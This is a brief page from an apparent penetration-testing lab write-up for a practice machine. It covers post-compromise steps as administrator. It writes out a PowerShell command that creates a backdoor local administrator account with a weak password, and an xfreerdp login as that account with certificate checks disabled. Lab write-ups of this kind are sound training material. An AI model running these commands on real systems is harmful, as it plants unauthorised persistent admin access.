Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the administrator
user after compromising the target system.
PS C:\WINDOWS\system32> net user /ADD adm1n qwe123 ; net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ xfreerdp /u:adm1n /p:'qwe123' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
RDP
Scheduled Tasks
Simulation
Custom binary
XAMPP
All XAMPP related processes are running with privileges of the
mike
user.
It’s questionable how exploiting
CVE-2020-11107
leads to the administrator
user